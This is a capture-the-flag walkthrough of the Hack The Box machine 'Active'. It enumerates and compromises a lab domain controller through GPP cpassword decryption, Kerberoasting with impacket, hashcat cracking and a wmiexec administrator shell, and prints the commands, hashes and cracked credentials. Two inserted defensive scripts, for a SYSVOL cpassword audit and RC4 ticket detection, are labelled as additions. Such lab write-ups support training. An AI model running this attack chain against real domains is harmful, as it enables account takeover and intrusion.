Active - in Arabic

Recon

nmap

nmap -sV -sC -p- 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 07:46 EDT
Nmap scan report for 10.10.10.100
Host is up (0.41s latency).
Not shown: 65512 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-13 12:43:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 33m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-13T12:44:51
|_ start_date: 2021-05-13T12:19:24
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1473.41 seconds

SMB

smbmap & smbclient

smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS

We have READ ONLY on Replication, so let's take a look at it.

smbclient //10.10.10.100/Replication
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5728531 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
10459647 blocks of size 4096. 5728531 blocks available

We'll download everything, using these commands:

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

After downloading, I searched through the files and poked around a bit; eventually I reached Policies and, at the end, a Groups.xml file. As soon as I saw them I knew these are GPP, or Group Policy Preferences: a set of Group Policy extensions that live on the client side, and they deliver settings to the machines that are joined to the domain.

These can contain usernames and passwords, so if you go here:

active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

and open this file, you'll find this code:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

If you look closely there is a name and also a cpassword, which is encrypted with AES, so we need to break the encryption or crack it; we can use a tool called gpp-decrypt.py.

python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Password: GPPstillStandingStrong2k18
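From the defender's side, the check that matters is whether any GPP file in SYSVOL still carries a cpassword at all. The following audit script is an added example, not part of the original write-up or of gpp-decrypt.py: it parses the Groups.xml shown above (embedded here as constructed sample data) and walks a copied Policies tree for the other preference XMLs that can hold a cpassword, reporting the element and account rather than decrypting anything.

```python
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Preference XMLs that Microsoft documented as able to carry cpassword (MS14-025).
GPP_FILES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

@dataclass
class Finding:
    path: str
    element: str
    account: str
    cpassword: str

def find_cpassword(xml_text: str, path: str = "<memory>") -> list:
    """Return one Finding per element whose cpassword attribute is non-empty."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if cpw:  # an empty cpassword="" means no stored secret
            # The account attribute differs per preference type.
            account = (elem.get("userName") or elem.get("accountName")
                       or elem.get("runAs") or "")
            findings.append(Finding(path, elem.tag, account, cpw))
    return findings

def audit_sysvol(root_dir: str) -> list:
    """Walk a copied Policies tree (like the smbclient mget above) and
    collect cpassword findings from every GPP file in it."""
    results = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:
                    results.extend(find_cpassword(fh.read(), full))
    return results

# Constructed sample: the Groups.xml content from the write-up.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for f in find_cpassword(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f.path}: <{f.element}> for {f.account} carries a cpassword")
```

Any hit means the preference should be removed from the GPO and the account's password rotated, since the cpassword is recoverable by anyone who can read SYSVOL.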

Just like that we got a password. That's awesome by the way, you have to celebrate, my friend, try jumping out of the window.

CREDS: svc_tgs:GPPstillStandingStrong2k18

MSRPC

rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

After I saw the NT_STATUS_ACCESS_DENIED message I figured there was nothing to hope for there, and honestly I didn't care much about LDAP, so I decided to go straight to the Get Access stage and log into the machine; unfortunately that didn't work, so I went back to SMB with the creds we got.

SMB with svc_tgs

smbclient //10.10.10.100/Users -U 'svc_tgs'
Enter WORKGROUP\svc_tgs's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5728499 blocks available

Of course I downloaded everything, just like we did before.

So much time on DAT files

After downloading them (I had finished everything above in under 10 minutes), I sat analyzing these DAT files for a couple of hours, searching and reading, and in the end nothing came of it, or at least I didn't find anything. Of course I had to get past it, even though my heart was broken; you have to move on to the next stage.

Kerberoasting

Let's go, Kerberoasting ❤

impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

If you happen to get an error message like this:

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

use this tool; the problem is the time synchronization between you and the target:

ntpdate 10.10.10.100

Anyway, we got the TGT:

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$f3549302f6dd2e829e0b67a08c8f68f014bea465fc1d0c5fe21e9bed19023293dd073c0dc586f2966bb40dcf2b562e98cfd957cec08bb7c72bb70fc7f6c8a046491637edc5f0fb647ee580bd73efb5393bb0edc16127345a2c4a3308daf69337ed33a0171cd16cb25bec00272ee67eaf45e729c60162ad274d73229f67a3824466a179d4f9b27e9aee2f4cce2c9dfd71047dc701db1c2d9c35b7dee5f66c4c9b8104025483f5c8da703b8b02681ec555e1beaac0bc191ac8f4076a298485402dc8d2906d78aa2beaee5be930d1019a651475224ae20e83f74da92402cb6448a38265c89a225c7389576f5498152e7e19624508be412500ee832a321662f3b3270720d38b3827c32b5bed9fee4308b32cb04dcf6321dc6d4a13cbf447c100f765d2b5d9cff2c0c5829f1e81c689760bdec97b5e68ced8f644bccca83cb12545f583b39c67886692fca4023ce9a00bac2c14d2b5da844a9cabad5df166bf58216b0fd10d6a48e1c65c3680162c1a55e8d08558cb952e115c009bf73e37a969610e5851ce44c54a90443da67efa34581769b9529f596a55f4d114504f398a359d21ad8af6d824a8bfd7fb97820db023d4b01021ac3fffe59734f2f96ea981fa9a460c968de8c8d8b2cb2c4dccc34998f55b15dfa2a98e998268fea835b87b6720aed1b4c3b5c08e7fcc8d88699b346a00f2f7f1e4424503fc9448cf3f309247ed393f2abbb0e0b01d55c4a7882eac246b6e27586a0494bb87e6e6e467a466366478690c7fde07106cacf656ca9f83a16c5199c314abbfa2a8a5ef4af6b34038ec6ff3593884d21182a93478554fcf25ecdfc1d9487437292fd517377858603bb7e05296b7737ead17ee182c632b97e4c0c23872af2f731919fb9aa954a710f8f5a7a0216dfdd8deeaaadcefddbeec69d88d7b644859e47fdf2c7deec748028a978957104632e87021411fb06ecff4e579441933d5a7ba9bf422b2834cdf9fe4988eb6e394ea3b2b20eecdd7fc4c25f4dae66d090417288700b385036d16ca373d146820a10d2404192701595f22660900b1f7ad2145a7bb13ae3db3ae5ba70c41a6787f3baf48e8d844b43a95d7665281a18e5ea64b7d0f7b15b4188278f64452f8c5a3d1f8e11f79b4420d1b87f7c987533486fb763a96b1209d5d7684254560952b478b7ac26ddb2bc8ff89c4734d06c627f9ad423710a242de08c6b5ba683f440a66bdba3abb563abb532a444b226422c934c2c7a4ab6f61ae30

We crack it with hashcat:

hashcat.exe -m 13100 admin_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$[...]:Ticketmaster1968

And so we got the last creds we need:

CREDS: Administrator:Ticketmaster1968
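The `$krb5tgs$23$` prefix above means the service ticket was issued with RC4-HMAC (etype 23, logged as TicketEncryptionType 0x17 in Windows Security event 4769), which is the signal a defender watches for. The detection below is an added example, not part of the original write-up: it takes 4769 records (constructed here, with the documented field names) and flags RC4 service tickets requested for services that run under user accounts, grouped by requester.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23: the "$krb5tgs$23$" prefix in the hash above

def _etype(value) -> int:
    """TicketEncryptionType appears as "0x17" in event XML; accept int or str."""
    return int(str(value), 0)

def is_roast_candidate(ev: dict) -> bool:
    """RC4 service ticket for a service run under a user account: the
    combination Kerberoasting needs (machine accounts and krbtgt excluded)."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return _etype(ev["TicketEncryptionType"]) == RC4_HMAC

def detect_kerberoast(events, min_services: int = 1) -> dict:
    """Group candidate 4769s by (requesting user, source IP) and return the
    sorted service names each requester touched, if at least min_services."""
    hits = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_services}

# Constructed sample 4769 records (fields named as in the Windows event XML).
SAMPLE_4769 = [
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.100"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.9"},
]

if __name__ == "__main__":
    for (user, ip), services in detect_kerberoast(SAMPLE_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

Raise `min_services` in a domain where a few legitimate RC4-only services still exist; the underlying fix is AES-only service accounts with long random passwords, which removes the cheap offline crack shown with hashcat above.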

Get Access

Now, using the wmiexec tool, we can get into the machine:

wmiexec.py 'active.htb/Administrator:Ticketmaster1968@10.10.10.100'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
C:\>

The wmiexec tool uses the WMI protocol, which is part of Microsoft's management tooling: it basically gives you a kind of administration and monitoring capability and provides information about Windows systems, and you can also write tools and automation against it with things like VBScript and PowerShell. That's where we finish, bye!

Happy Hacking MHZ-Cyber